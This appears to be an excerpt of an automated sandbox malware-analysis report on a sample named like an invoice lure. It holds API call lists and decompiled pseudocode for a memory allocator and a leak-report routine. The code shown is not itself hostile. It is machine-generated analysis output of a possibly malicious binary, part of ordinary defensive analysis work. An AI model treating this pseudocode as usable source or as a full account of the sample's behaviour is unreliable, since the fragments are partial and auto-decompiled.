    • VirtualAlloc.KERNEL32(?,?,00002000,00000004), ref: 00401841
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000004), ref: 00401857
      • Part of subcall function 004018F8: VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 004016C4
      • Part of subcall function 004018F8: Sleep.KERNEL32(00000000), ref: 004019AF
      • Part of subcall function 004018F8: Sleep.KERNEL32(0000000A,00000000), ref: 004019C5
      • Part of subcall function 004018F8: Sleep.KERNEL32(00000000), ref: 004019F3
      • Part of subcall function 004018F8: Sleep.KERNEL32(0000000A,00000000), ref: 00401A09
      • Part of subcall function 004018F8: Sleep.KERNEL32(00000000), ref: 00401B38
      • Part of subcall function 004018F8: Sleep.KERNEL32(0000000A,00000000), ref: 00401B4E
      • Part of subcall function 00401C7C: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401737
      • Part of subcall function 00401C7C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040175A
      • Part of subcall function 00401C7C: VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00401767
      • Part of subcall function 00401C7C: Sleep.KERNEL32(00000000,?), ref: 00401D12
      • Part of subcall function 00401C7C: Sleep.KERNEL32(0000000A,00000000,?), ref: 00401D2C
      • Part of subcall function 00401C7C: Sleep.KERNEL32(00000000), ref: 00401D54
      • Part of subcall function 00401C7C: Sleep.KERNEL32(0000000A,00000000), ref: 00401D6A
      • Part of subcall function 00401C7C: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401E24
    • Sleep.KERNEL32(00000000,?), ref: 00401F93
    • Sleep.KERNEL32(0000000A,00000000,?), ref: 00401FAB
    • Sleep.KERNEL32(00000000,?,?), ref: 0040207C
    • Sleep.KERNEL32(0000000A,00000000,?,?), ref: 00402096
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 67%
    			E004018F8(signed int __eax) {
    				signed int __ebx;
    				signed int __edi;
    				signed int __esi;
    				intOrPtr* _t99;
    				signed int _t104;
    				signed int _t109;
    				signed int _t110;
    				intOrPtr* _t114;
    				void* _t116;
    				intOrPtr* _t121;
    				signed int _t125;
    				signed int _t129;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t135;
    				unsigned int _t141;
    				signed int _t142;
    				void* _t144;
    				intOrPtr* _t147;
    				intOrPtr _t148;
    				signed int _t150;
    				long _t156;
    				intOrPtr _t159;
    				signed int _t162;
    
    				_t129 =  *0x41304d; // 0x0
    				if(__eax > 0xa2c) {
    					__eflags = __eax - 0x40a2c;
    					if(__eax > 0x40a2c) {
    						_pop(_t120);
    						__eflags = __eax;
    						if(__eax >= 0) {
    							_push(_t120);
    							_t162 = __eax;
    							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
    							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
    							if(_t121 != 0) {
    								_t147 = _t121;
    								 *((intOrPtr*)(_t147 + 8)) = _t162;
    								 *(_t147 + 0xc) = _t156 | 0x00000004;
    								E0040165C();
    								_t99 =  *0x415acc; // 0x7fe80000
    								 *_t147 = 0x415ac8;
    								 *0x415acc = _t121;
    								 *((intOrPtr*)(_t147 + 4)) = _t99;
    								 *_t99 = _t121;
    								 *0x415ac4 = 0;
    								_t121 = _t121 + 0x10;
    							}
    							return _t121;
    						} else {
    							__eflags = 0;
    							return 0;
    						}
    					} else {
    						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
    						__eflags = _t129;
    						if(__eflags != 0) {
    							while(1) {
    								asm("lock cmpxchg [0x413a34], ah");
    								if(__eflags == 0) {
    									goto L42;
    								}
    								asm("pause");
    								__eflags =  *0x4138d5;
    								if(__eflags != 0) {
    									continue;
    								} else {
    									Sleep(0);
    									asm("lock cmpxchg [0x413a34], ah");
    									if(__eflags != 0) {
    										Sleep(0xa);
    										continue;
    									}
    								}
    								goto L42;
    							}
    						}
    						L42:
    						_t141 = _t125 - 0xb30;
    						_t142 = _t141 >> 0xd;
    						_t131 = _t141 >> 8;
    						_t104 = 0xffffffff << _t131 &  *(0x413a44 + _t142 * 4);
    						__eflags = 0xffffffff;
    						if(0xffffffff == 0) {
    							_t132 = _t142;
    							__eflags = 0xfffffffe << _t132 &  *0x413a40;
    							if((0xfffffffe << _t132 &  *0x413a40) == 0) {
    								_t133 =  *0x413a3c; // 0x20dc0
    								_t134 = _t133 - _t125;
    								__eflags = _t134;
    								if(_t134 < 0) {
    									_t109 = E004015E4(_t125);
    								} else {
    									_t110 =  *0x413a38; // 0x1170dd0
    									_t109 = _t110 - _t125;
    									 *0x413a38 = _t109;
    									 *0x413a3c = _t134;
    									 *(_t109 - 4) = _t125 | 0x00000002;
    								}
    								 *0x413a34 = 0;
    								return _t109;
    							} else {
    								asm("bsf edx, eax");
    								asm("bsf ecx, eax");
    								_t135 = _t132 | _t142 << 0x00000005;
    								goto L50;
    							}
    						} else {
    							asm("bsf eax, eax");
    							_t135 = _t131 & 0xffffffe0 | _t104;
    							L50:
    							_push(_t152);
    							_push(_t145);
    							_t148 = 0x413ac4 + _t135 * 8;
    							_t159 =  *((intOrPtr*)(_t148 + 4));
    							_t114 =  *((intOrPtr*)(_t159 + 4));
    							 *((intOrPtr*)(_t148 + 4)) = _t114;
    							 *_t114 = _t148;
    							__eflags = _t148 - _t114;
    							if(_t148 == _t114) {
    								asm("rol eax, cl");
    								_t80 = 0x413a44 + _t142 * 4;
    								 *_t80 =  *(0x413a44 + _t142 * 4) & 0xfffffffe;
    								__eflags =  *_t80;
    								if( *_t80 == 0) {
    									asm("btr [0x413a40], edx");
    								}
    							}
    							_t150 = 0xfffffff0 &  *(_t159 - 4);
    							_t144 = 0xfffffff0 - _t125;
    							__eflags = 0xfffffff0;
    							if(0xfffffff0 == 0) {
    								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
    								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
    								__eflags =  *_t89;
    							} else {
    								_t116 = _t125 + _t159;
    								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
    								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
    								__eflags = 0xfffffff0 - 0xb30;
    								if(0xfffffff0 >= 0xb30) {
    									E00401518(_t116, 0xfffffffffffffff3, _t144);
    								}
    							}
    							 *(_t159 - 4) = _t125 + 2;
    							 *0x413a34 = 0;
    							return _t159;
    						}
    					}
    				} else {
    					__eflags = __cl;
    					__eax =  *(__edx + 0x4138dc) & 0x000000ff;
    					__ebx = 0x41205c + ( *(__edx + 0x4138dc) & 0x000000ff) * 8;
    					if(__eflags != 0) {
    						while(1) {
    							__eax = 0x100;
    							asm("lock cmpxchg [ebx], ah");
    							if(__eflags == 0) {
    								goto L5;
    							}
    							__ebx = __ebx + 0x20;
    							__eflags = __ebx;
    							__eax = 0x100;
    							asm("lock cmpxchg [ebx], ah");
    							if(__ebx != 0) {
    								__ebx = __ebx + 0x20;
    								__eflags = __ebx;
    								__eax = 0x100;
    								asm("lock cmpxchg [ebx], ah");
    								if(__ebx != 0) {
    									__ebx = __ebx - 0x40;
    									asm("pause");
    									__eflags =  *0x4138d5;
    									if(__eflags != 0) {
    										continue;
    									} else {
    										Sleep(0);
    										__eax = 0x100;
    										asm("lock cmpxchg [ebx], ah");
    										if(__eflags != 0) {
    											Sleep(0xa);
    											continue;
    										}
    									}
    								}
    							}
    							goto L5;
    						}
    					}
    					L5:
    					__edx =  *(__ebx + 4);
    					__eax =  *(__edx + 8);
    					__ecx = 0xfffffff8;
    					__eflags = __edx - __ebx;
    					if(__edx == __ebx) {
    						__edx =  *(__ebx + 0x10);
    						__ecx =  *(__ebx + 2) & 0x0000ffff;
    						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
    						__eflags = __eax -  *(__ebx + 0xc);
    						if(__eax >  *(__ebx + 0xc)) {
    							_push(__esi);
    							_push(__edi);
    							__eflags =  *0x41304d;
    							if(__eflags != 0) {
    								while(1) {
    									__eax = 0x100;
    									asm("lock cmpxchg [0x413a34], ah");
    									if(__eflags == 0) {
    										goto L22;
    									}
    									asm("pause");
    									__eflags =  *0x4138d5;
    									if(__eflags != 0) {
    										continue;
    									} else {
    										Sleep(0);
    										__eax = 0x100;
    										asm("lock cmpxchg [0x413a34], ah");
    										if(__eflags != 0) {
    											Sleep(0xa);
    											continue;
    										}
    									}
    									goto L22;
    								}
    							}
    							L22:
    							 *(__ebx + 1) =  *(__ebx + 1) &  *0x413a40;
    							__eflags =  *(__ebx + 1) &  *0x413a40;
    							if(( *(__ebx + 1) &  *0x413a40) == 0) {
    								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
    								__edi =  *0x413a3c; // 0x20dc0
    								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
    								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
    									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
    									__edi = __eax;
    									__eax = E004015E4(__eax);
    									__esi = __eax;
    									__eflags = __eax;
    									if(__eax != 0) {
    										goto L35;
    									} else {
    										 *0x413a34 = __al;
    										 *__ebx = __al;
    										_pop(__edi);
    										_pop(__esi);
    										_pop(__ebx);
    										return __eax;
    									}
    								} else {
    									__esi =  *0x413a38; // 0x1170dd0
    									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
    									__edx = __ecx + 0xb30;
    									__eflags = __edi - __ecx + 0xb30;
    									if(__edi >= __ecx + 0xb30) {
    										__edi = __ecx;
    									}
    									__esi = __esi - __edi;
    									 *0x413a3c =  *0x413a3c - __edi;
    									 *0x413a38 = __esi;
    									goto L35;
    								}
    							} else {
    								asm("bsf eax, esi");
    								__esi = __eax * 8;
    								__ecx =  *(0x413a44 + __eax * 4);
    								asm("bsf ecx, ecx");
    								__ecx =  *(0x413a44 + __eax * 4) + __eax * 8 * 4;
    								__edi = 0x413ac4 + ( *(0x413a44 + __eax * 4) + __eax * 8 * 4) * 8;
    								__esi =  *(__edi + 4);
    								__edx =  *(__esi + 4);
    								 *(__edi + 4) = __edx;
    								 *__edx = __edi;
    								__eflags = __edi - __edx;
    								if(__edi == __edx) {
    									__edx = 0xfffffffe;
    									asm("rol edx, cl");
    									_t38 = 0x413a44 + __eax * 4;
    									 *_t38 =  *(0x413a44 + __eax * 4) & 0xfffffffe;
    									__eflags =  *_t38;
    									if( *_t38 == 0) {
    										asm("btr [0x413a40], eax");
    									}
    								}
    								__edi = 0xfffffff0;
    								__edi = 0xfffffff0 &  *(__esi - 4);
    								__eflags = 0xfffffff0 - 0x10a60;
    								if(0xfffffff0 < 0x10a60) {
    									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
    									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
    									__eflags =  *_t52;
    								} else {
    									__edx = __edi;
    									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
    									__edx = __edx - __edi;
    									__eax = __edi + __esi;
    									__ecx = __edx + 3;
    									 *(__eax - 4) = __ecx;
    									 *(__edx + __eax - 8) = __edx;
    									__eax = E00401518(__eax, __ecx, __edx);
    								}
    								L35:
    								_t56 = __edi + 6; // 0x20dc6
    								__ecx = _t56;
    								 *(__esi - 4) = _t56;
    								__eax = 0;
    								 *0x413a34 = __al;
    								 *__esi = __ebx;
    								 *((intOrPtr*)(__esi + 8)) = 0;
    								 *((intOrPtr*)(__esi + 0xc)) = 1;
    								 *(__ebx + 0x10) = __esi;
    								_t61 = __esi + 0x20; // 0x1170df0
    								__eax = _t61;
    								__ecx =  *(__ebx + 2) & 0x0000ffff;
    								__edx = __ecx + __eax;
    								 *(__ebx + 8) = __ecx + __eax;
    								__edi = __edi + __esi;
    								__edi = __edi - __ecx;
    								__eflags = __edi;
    								 *(__ebx + 0xc) = __edi;
    								 *__ebx = 0;
    								 *(__eax - 4) = __esi;
    								_pop(__edi);
    								_pop(__esi);
    								_pop(__ebx);
    								return __eax;
    							}
    						} else {
    							_t19 = __edx + 0xc;
    							 *_t19 =  *(__edx + 0xc) + 1;
    							__eflags =  *_t19;
    							 *(__ebx + 8) = __ecx;
    							 *__ebx = 0;
    							 *(__eax - 4) = __edx;
    							_pop(__ebx);
    							return __eax;
    						}
    					} else {
    						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
    						__ecx = 0xfffffff8 &  *(__eax - 4);
    						__eflags = 0xfffffff8;
    						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
    						 *(__eax - 4) = __edx;
    						if(0xfffffff8 == 0) {
    							__ecx =  *(__edx + 4);
    							 *(__ecx + 0x14) = __ebx;
    							 *(__ebx + 4) = __ecx;
    							 *__ebx = 0;
    							_pop(__ebx);
    							return __eax;
    						} else {
    							 *__ebx = 0;
    							_pop(__ebx);
    							return __eax;
    						}
    					}
    				}
    			}





























    0x00401904
    0x0040190a
    0x00401b58
    0x00401b5d
    0x00401c70
    0x00401c71
    0x00401c73
    0x004016a4
    0x004016a8
    0x004016b4
    0x004016c9
    0x004016cd
    0x004016cf
    0x004016d1
    0x004016d7
    0x004016da
    0x004016df
    0x004016e4
    0x004016ea
    0x004016f0
    0x004016f3
    0x004016f5
    0x004016fc
    0x004016fc
    0x00401705
    0x00401c79
    0x00401c79
    0x00401c7b
    0x00401c7b
    0x00401b63
    0x00401b6f
    0x00401b72
    0x00401b74
    0x00401b1c
    0x00401b21
    0x00401b29
    0x00000000
    0x00000000
    0x00401b2b
    0x00401b2d
    0x00401b34
    0x00000000
    0x00401b36
    0x00401b38
    0x00401b42
    0x00401b4a
    0x00401b4e
    0x00000000
    0x00401b4e
    0x00401b4a
    0x00000000
    0x00401b34
    0x00401b1c
    0x00401b76
    0x00401b76
    0x00401b7e
    0x00401b81
    0x00401b8b
    0x00401b8b
    0x00401b92
    0x00401ba5
    0x00401ba9
    0x00401baf
    0x00401bc8
    0x00401bce
    0x00401bce
    0x00401bd0
    0x00401bee
    0x00401bd2
    0x00401bd2
    0x00401bd7
    0x00401bd9
    0x00401bde
    0x00401be7
    0x00401be7
    0x00401bf3
    0x00401bfb
    0x00401bb1
    0x00401bb1
    0x00401bbb
    0x00401bc3
    0x00000000
    0x00401bc3
    0x00401b94
    0x00401b97
    0x00401b9a
    0x00401bfc
    0x00401bfc
    0x00401bfd
    0x00401bfe
    0x00401c05
    0x00401c08
    0x00401c0b
    0x00401c0e
    0x00401c10
    0x00401c12
    0x00401c19
    0x00401c1b
    0x00401c1b
    0x00401c1b
    0x00401c22
    0x00401c24
    0x00401c24
    0x00401c22
    0x00401c30
    0x00401c35
    0x00401c35
    0x00401c37
    0x00401c58
    0x00401c58
    0x00401c58
    0x00401c39
    0x00401c39
    0x00401c3f
    0x00401c42
    0x00401c46
    0x00401c4c
    0x00401c4e
    0x00401c4e
    0x00401c4c
    0x00401c60
    0x00401c63
    0x00401c6f
    0x00401c6f
    0x00401b92
    0x00401910
    0x00401910
    0x00401912
    0x00401919
    0x00401920
    0x00401978
    0x00401978
    0x0040197d
    0x00401981
    0x00000000
    0x00000000
    0x00401983
    0x00401983
    0x00401986
    0x0040198b
    0x0040198f
    0x00401991
    0x00401991
    0x00401994
    0x00401999
    0x0040199d
    0x0040199f
    0x004019a2
    0x004019a4
    0x004019ab
    0x00000000
    0x004019ad
    0x004019af
    0x004019b4
    0x004019b9
    0x004019bd
    0x004019c5
    0x00000000
    0x004019c5
    0x004019bd
    0x004019ab
    0x0040199d
    0x00000000
    0x0040198f
    0x00401978
    0x00401922
    0x00401922
    0x00401925
    0x00401928
    0x0040192d
    0x0040192f
    0x00401948
    0x0040194b
    0x0040194f
    0x00401951
    0x00401954
    0x004019cc
    0x004019cd
    0x004019ce
    0x004019d5
    0x004019d7
    0x004019d7
    0x004019dc
    0x004019e4
    0x00000000
    0x00000000
    0x004019e6
    0x004019e8
    0x004019ef
    0x00000000
    0x004019f1
    0x004019f3
    0x004019f8
    0x004019fd
    0x00401a05
    0x00401a09
    0x00000000
    0x00401a09
    0x00401a05
    0x00000000
    0x004019ef
    0x004019d7
    0x00401a10
    0x00401a14
    0x00401a14
    0x00401a1a
    0x00401a8c
    0x00401a90
    0x00401a96
    0x00401a98
    0x00401ac0
    0x00401ac4
    0x00401ac6
    0x00401acb
    0x00401acd
    0x00401acf
    0x00000000
    0x00401ad1
    0x00401ad1
    0x00401ad6
    0x00401ad8
    0x00401ad9
    0x00401ada
    0x00401adb
    0x00401adb
    0x00401a9a
    0x00401a9a
    0x00401aa0
    0x00401aa4
    0x00401aaa
    0x00401aac
    0x00401aae
    0x00401aae
    0x00401ab0
    0x00401ab2
    0x00401ab8
    0x00000000
    0x00401ab8
    0x00401a1c
    0x00401a1c
    0x00401a1f
    0x00401a26
    0x00401a2d
    0x00401a30
    0x00401a33
    0x00401a3a
    0x00401a3d
    0x00401a40
    0x00401a43
    0x00401a45
    0x00401a47
    0x00401a49
    0x00401a4e
    0x00401a50
    0x00401a50
    0x00401a50
    0x00401a57
    0x00401a59
    0x00401a59
    0x00401a57
    0x00401a60
    0x00401a65
    0x00401a68
    0x00401a6e
    0x00401adc
    0x00401adc
    0x00401adc
    0x00401a70
    0x00401a70
    0x00401a72
    0x00401a76
    0x00401a78
    0x00401a7b
    0x00401a7e
    0x00401a81
    0x00401a85
    0x00401a85
    0x00401ae1
    0x00401ae1
    0x00401ae1
    0x00401ae4
    0x00401ae7
    0x00401ae9
    0x00401aee
    0x00401af0
    0x00401af3
    0x00401afa
    0x00401afd
    0x00401afd
    0x00401b00
    0x00401b04
    0x00401b07
    0x00401b0a
    0x00401b0c
    0x00401b0c
    0x00401b0e
    0x00401b11
    0x00401b14
    0x00401b17
    0x00401b18
    0x00401b19
    0x00401b1a
    0x00401b1a
    0x00401956
    0x00401956
    0x00401956
    0x00401956
    0x0040195a
    0x0040195d
    0x00401960
    0x00401963
    0x00401964
    0x00401964
    0x00401931
    0x00401931
    0x00401935
    0x00401935
    0x00401938
    0x0040193b
    0x0040193e
    0x00401968
    0x0040196b
    0x0040196e
    0x00401971
    0x00401974
    0x00401975
    0x00401940
    0x00401940
    0x00401943
    0x00401944
    0x00401944
    0x0040193e
    0x0040192f

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 004016C4
      • Part of subcall function 0040165C: Sleep.KERNEL32(00000000,004016DF,00000000,?,00101000,00000004), ref: 00401672
      • Part of subcall function 0040165C: Sleep.KERNEL32(0000000A,00000000,004016DF,00000000,?,00101000,00000004), ref: 0040168B
    • Sleep.KERNEL32(00000000), ref: 004019AF
    • Sleep.KERNEL32(0000000A,00000000), ref: 004019C5
    • Sleep.KERNEL32(00000000), ref: 004019F3
    • Sleep.KERNEL32(0000000A,00000000), ref: 00401A09
    • Sleep.KERNEL32(00000000), ref: 00401B38
    • Sleep.KERNEL32(0000000A,00000000), ref: 00401B4E
      • Part of subcall function 004015E4: VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401BF3), ref: 004015FA
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 98%
    			E004027B8(void* __eax, void* __fp0) {
    				void* _v8;
    				char _v110600;
    				char _v112644;
    				char _v112645;
    				signed int _v112652;
    				char _v112653;
    				char _v112654;
    				char _v112660;
    				intOrPtr _v112664;
    				intOrPtr _v112668;
    				intOrPtr _v112672;
    				signed short* _v112676;
    				void* _v112680;
    				char _v129064;
    				char _v131113;
    				char _v161832;
    				void* _t70;
    				int _t76;
    				intOrPtr _t79;
    				intOrPtr _t90;
    				CHAR* _t94;
    				intOrPtr _t96;
    				void* _t106;
    				intOrPtr _t107;
    				intOrPtr _t113;
    				intOrPtr _t118;
    				void* _t128;
    				intOrPtr _t129;
    				intOrPtr _t133;
    				signed int _t143;
    				int _t148;
    				intOrPtr _t149;
    				char* _t151;
    				char* _t152;
    				char* _t153;
    				char* _t154;
    				char* _t155;
    				char* _t156;
    				char* _t158;
    				char* _t159;
    				char* _t164;
    				char* _t165;
    				intOrPtr _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr* _t203;
    				void* _t205;
    				void* _t206;
    				signed int _t211;
    				void* _t214;
    				void* _t215;
    				void* _t228;
    
    				_push(__eax);
    				_t70 = 0x27;
    				goto L1;
    				L12:
    				while(_t197 != 0x413a24) {
    					_t76 = E004021E4(_t197);
    					_t148 = _t76;
    					__eflags = _t148;
    					if(_t148 == 0) {
    						L11:
    						_t20 = _t197 + 4; // 0x413a24
    						_t197 =  *_t20;
    						continue;
    					} else {
    						goto L4;
    					}
    					do {
    						L4:
    						_t211 =  *(_t148 - 4);
    						__eflags = _t211 & 0x00000001;
    						if((_t211 & 0x00000001) == 0) {
    							__eflags = _t211 & 0x00000004;
    							if(__eflags == 0) {
    								__eflags = _v112652 - 0x1000;
    								if(_v112652 < 0x1000) {
    									_v112664 = (_t211 & 0xfffffff0) - 4;
    									_t143 = E004025A0(_t148);
    									__eflags = _t143;
    									if(_t143 == 0) {
    										_v112645 = 0;
    										 *((intOrPtr*)(_t214 + _v112652 * 4 - 0x1f824)) = _v112664;
    										_t18 =  &_v112652;
    										 *_t18 = _v112652 + 1;
    										__eflags =  *_t18;
    									}
    								}
    							} else {
    								E004025F8(_t148, __eflags, _t214);
    							}
    						}
    						_t76 = E004021C0(_t148);
    						_t148 = _t76;
    						__eflags = _t148;
    					} while (_t148 != 0);
    					goto L11;
    				}
    				_t149 =  *0x415acc; // 0x415ac8
    				while(_t149 != 0x415ac8 && _v112652 < 0x1000) {
    					_t76 = E004025A0(_t149 + 0x10);
    					__eflags = _t76;
    					if(_t76 == 0) {
    						_v112645 = 0;
    						_t22 = _t149 + 0xc; // 0x0
    						_t76 = _v112652;
    						 *((intOrPtr*)(_t214 + _t76 * 4 - 0x1f824)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
    						_t27 =  &_v112652;
    						 *_t27 = _v112652 + 1;
    						__eflags =  *_t27;
    					}
    					_t29 = _t149 + 4; // 0x415ac8
    					_t149 =  *_t29;
    				}
    				if(_v112645 != 0) {
    					L50:
    					return _t76;
    				}
    				_v112653 = 0;
    				_v112668 = 0;
    				_t79 =  *0x412038; // 0x40126c
    				_t151 = E0040237C(E00404914(_t79),  &_v161832);
    				_v112660 = 0x37;
    				_v112676 = 0x41205e;
    				_v112680 =  &_v110600;
    				do {
    					_v112672 = ( *_v112676 & 0x0000ffff) - 4;
    					_v112654 = 0;
    					_t199 = 0xff;
    					_t203 = _v112680;
    					while(_t151 <=  &_v131113) {
    						if( *_t203 > 0) {
    							if(_v112653 == 0) {
    								_t133 =  *0x41203c; // 0x401298
    								_t151 = E0040237C(E00404914(_t133), _t151);
    								_v112653 = 1;
    							}
    							if(_v112654 != 0) {
    								 *_t151 = 0x2c;
    								_t156 = _t151 + 1;
    								 *_t156 = 0x20;
    								_t157 = _t156 + 1;
    								__eflags = _t156 + 1;
    							} else {
    								 *_t151 = 0xd;
    								 *((char*)(_t151 + 1)) = 0xa;
    								_t164 = E00402260(_v112668 + 1, _t151 + 2);
    								 *_t164 = 0x20;
    								_t165 = _t164 + 1;
    								 *_t165 = 0x2d;
    								 *((char*)(_t165 + 1)) = 0x20;
    								_t128 = E00402260(_v112672, _t165 + 2);
    								_t129 =  *0x412044; // 0x401300
    								_t157 = E0040237C(E00404914(_t129), _t128);
    								_v112654 = 1;
    							}
    							_t106 = _t199 - 1;
    							_t228 = _t106;
    							if(_t228 < 0) {
    								_t107 =  *0x412048; // 0x40130c
    								_t158 = E0040237C(E00404914(_t107), _t157);
    							} else {
    								if(_t228 == 0) {
    									_t113 =  *0x41204c; // 0x401314
    									_t158 = E0040237C(E00404914(_t113), _t157);
    								} else {
    									if(_t106 == 1) {
    										_t118 =  *0x412050; // 0x401320
    										_t158 = E0040237C(E00404914(_t118), _t157);
    									} else {
    										_t158 = E00402394( *((intOrPtr*)(_t203 - 4)), _t157);
    									}
    								}
    							}
    							 *_t158 = 0x20;
    							_t159 = _t158 + 1;
    							 *_t159 = 0x78;
    							 *((char*)(_t159 + 1)) = 0x20;
    							_t151 = E00402260( *_t203, _t159 + 2);
    						}
    						_t199 = _t199 - 1;
    						_t203 = _t203 - 8;
    						if(_t199 != 0xffffffff) {
    							continue;
    						} else {
    							goto L39;
    						}
    					}
    					L39:
    					_v112668 = _v112672;
    					_v112680 = _v112680 + 0x800;
    					_v112676 =  &(_v112676[0x10]);
    					_t57 =  &_v112660;
    					 *_t57 = _v112660 - 1;
    				} while ( *_t57 != 0);
    				if(_v112652 <= 0) {
    					L49:
    					_t90 =  *0x412054; // 0x401330
    					E0040237C(E00404914(_t90), _t151);
    					_t94 =  *0x412058; // 0x401334
    					_t76 = MessageBoxA(0,  &_v161832, _t94, 0x2010);
    					goto L50;
    				}
    				if(_v112653 != 0) {
    					 *_t151 = 0xd;
    					_t153 = _t151 + 1;
    					 *_t153 = 0xa;
    					_t154 = _t153 + 1;
    					 *_t154 = 0xd;
    					_t155 = _t154 + 1;
    					 *_t155 = 0xa;
    					_t151 = _t155 + 1;
    				}
    				_t96 =  *0x412040; // 0x4012c0
    				_t151 = E0040237C(E00404914(_t96), _t151);
    				_t205 = _v112652 - 1;
    				if(_t205 >= 0) {
    					_t206 = _t205 + 1;
    					_t200 = 0;
    					_v112680 =  &_v129064;
    					L45:
    					L45:
    					if(_t200 != 0) {
    						 *_t151 = 0x2c;
    						_t152 = _t151 + 1;
    						 *_t152 = 0x20;
    						_t151 = _t152 + 1;
    					}
    					_t151 = E00402260( *_v112680, _t151);
    					if(_t151 >  &_v131113) {
    						goto L49;
    					}
    					_t200 = _t200 + 1;
    					_v112680 = _v112680 + 4;
    					_t206 = _t206 - 1;
    					if(_t206 != 0) {
    						goto L45;
    					}
    				}
    				L1:
    				_t215 = _t215 + 0xfffff004;
    				_push(_t70);
    				_t70 = _t70 - 1;
    				if(_t70 != 0) {
    					goto L1;
    				} else {
    					E00403250( &_v112644, 0x1b800);
    					E00403250( &_v129064, 0x4000);
    					_t76 = 0;
    					_v112652 = 0;
    					_v112645 = 1;
    					_t197 =  *0x413a28; // 0x413a24
    					goto L12;
    				}
    			}























































    0x004027bb
    0x004027bc
    0x004027bc
    0x00000000
    0x00402897
    0x00402817
    0x0040281c
    0x0040281e
    0x00402820
    0x00402894
    0x00402894
    0x00402894
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00402822
    0x00402822
    0x00402827
    0x00402829
    0x0040282f
    0x00402831
    0x00402837
    0x00402844
    0x0040284e
    0x00402856
    0x0040285e
    0x00402863
    0x00402865
    0x00402867
    0x0040287a
    0x00402881
    0x00402881
    0x00402881
    0x00402881
    0x00402865
    0x00402839
    0x0040283c
    0x00402841
    0x00402837
    0x00402889
    0x0040288e
    0x00402890
    0x00402890
    0x00000000
    0x00402822
    0x004028a3
    0x004028e2
    0x004028b0
    0x004028b5
    0x004028b7
    0x004028b9
    0x004028c0
    0x004028cc
    0x004028d2
    0x004028d9
    0x004028d9
    0x004028d9
    0x004028d9
    0x004028df
    0x004028df
    0x004028df
    0x004028fd
    0x00402b92
    0x00402b98
    0x00402b98
    0x00402903
    0x0040290c
    0x00402912
    0x0040292e
    0x00402930
    0x0040293a
    0x0040294a
    0x00402950
    0x0040295c
    0x00402962
    0x00402969
    0x00402974
    0x00402976
    0x00402987
    0x00402994
    0x00402996
    0x004029ae
    0x004029b0
    0x004029b0
    0x004029be
    0x00402a16
    0x00402a19
    0x00402a1a
    0x00402a1d
    0x00402a1d
    0x004029c0
    0x004029c0
    0x004029c4
    0x004029d6
    0x004029d8
    0x004029db
    0x004029dc
    0x004029e0
    0x004029ec
    0x004029f3
    0x00402a0b
    0x00402a0d
    0x00402a0d
    0x00402a20
    0x00402a20
    0x00402a23
    0x00402a2c
    0x00402a44
    0x00402a25
    0x00402a25
    0x00402a48
    0x00402a60
    0x00402a27
    0x00402a28
    0x00402a64
    0x00402a7c
    0x00402a2a
    0x00402a8a
    0x00402a8a
    0x00402a28
    0x00402a25
    0x00402a8c
    0x00402a8f
    0x00402a90
    0x00402a94
    0x00402aa1
    0x00402aa1
    0x00402aa3
    0x00402aa4
    0x00402aaa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00402aaa
    0x00402ab0
    0x00402ab6
    0x00402abc
    0x00402ac6
    0x00402acd
    0x00402acd
    0x00402acd
    0x00402ae0
    0x00402b61
    0x00402b61
    0x00402b74
    0x00402b7e
    0x00402b8d
    0x00000000
    0x00402b8d
    0x00402ae9
    0x00402aeb
    0x00402aee
    0x00402aef
    0x00402af2
    0x00402af3
    0x00402af6
    0x00402af7
    0x00402afa
    0x00402afa
    0x00402afb
    0x00402b13
    0x00402b1b
    0x00402b1e
    0x00402b20
    0x00402b21
    0x00402b29
    0x00000000
    0x00402b2f
    0x00402b31
    0x00402b33
    0x00402b36
    0x00402b37
    0x00402b3a
